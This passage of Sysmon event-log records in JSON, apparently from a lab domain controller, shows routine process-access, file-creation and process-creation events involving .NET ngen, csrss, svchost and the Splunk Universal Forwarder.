Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.978","SourceProcessGUID":"{E2A3D6B1-12EF-5F25-0000-0010BF740A00}","SourceProcessId":"1164","SourceThreadId":"4624","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:00.212\r\nProcessGuid: {E2A3D6B1-12EF-5F25-0000-001054740A00}\r\nProcessId: 2880\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b40-0\\System.Net.Http.dll\r\nCreationUtcTime: 2020-08-01 07:00:00.212","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:00.212","ProcessGuid":"{E2A3D6B1-12EF-5F25-0000-001054740A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b40-0\\System.Net.Http.dll","CreationUtcTime":"2020-08-01 07:00:00.212","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.243\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-001084790A00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.243","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-001084790A00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.243\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-001084790A00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.243","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-001084790A00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.259\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-001084790A00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.259","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-001084790A00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.322\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00100C7D0A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.322","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00100C7D0A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.322\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00100C7D0A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.322","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00100C7D0A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.337\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00100C7D0A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.337","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00100C7D0A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nProcessGuid: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nProcessId: 4544\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","ProcessGuid":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program 